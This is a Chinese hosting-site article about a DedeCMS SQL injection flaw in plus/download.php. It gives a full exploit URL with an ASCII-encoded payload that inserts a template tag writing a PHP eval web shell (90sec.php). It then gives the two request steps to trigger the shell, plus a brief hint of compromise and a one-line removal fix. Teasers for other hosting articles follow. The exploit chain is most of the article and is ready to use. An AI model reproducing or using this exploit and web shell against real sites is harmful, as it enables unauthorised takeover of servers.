dedecms 漏洞,可提权,后台提示用户名不存在解决方法
影响网站:
所有dedecms 版本
漏洞页面
plus/download.php
如果已经发现/data,有很长一个txt记事本,说明已经被其他人SQL注入了,或是已经有人进行尝试SQL注入了。记事本名如:75252sdaswfdfsfq538ef2ad3556_safe.txt这样的。
漏洞脚本
plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
漏洞使用
生成一句话:/plus/mytag_js.php?aid=9013
一句话页面:plus/90sec.php
相关系统:
   windows server 系列
建议:直接把plus目录下的下载文件及搜索php文件是直接删除就解决了
上一篇:Windows下自由创建.htaccess文件的几种方法
下一篇:ASP网站程序访问出现“常见错误 不能打开注册表关键字”的解决方法
本文标题:dedecms 漏洞,可提权,后台提示用户名不存在解决方法
本文地址:https://www.128sj.com/jiaocheng/20160803629.html,转载请注明出处
 
   今天有位站长朋友咨询了免费空间小编,说到他在虚拟主机里设置一下301跳转,问小编有没有好的方法或跳转的代码。...
  
 
   有时候我们要保护自己的网站图片,就需要设置防盗链了。下面是免费空间小编给大家分析的php免费空间如何设置防盗链...
  
 
   有时候我们要保护自己的网站图片,就需要设置防盗链了。下面是免费空间小编给大家分析的ASP免费空间如何设置防盗链...
  
 
   今天有位站长朋友咨询了免费空间小编,说到了免费空间设置301跳转,多久可以生效?...
  
 
   前几天有位站长朋友咨询了免费空间小编,问到了网站打不开出现 处理URL时服务器出错,请遇系统管理员联系。出现这问题,我们该怎么办呢?...
  
 
   前几天有位站长朋友咨询免费空间小编,问到了网站打不开出现HTTP 500 - 内部服务器错误,应该怎么解决呢?...
  
 
   前几天有位站长朋友咨询了免费空间小编,问到网站打不开出现Service Unavailable。应该怎么办呢?下面免费空间小编就给大家介绍一下解决方法...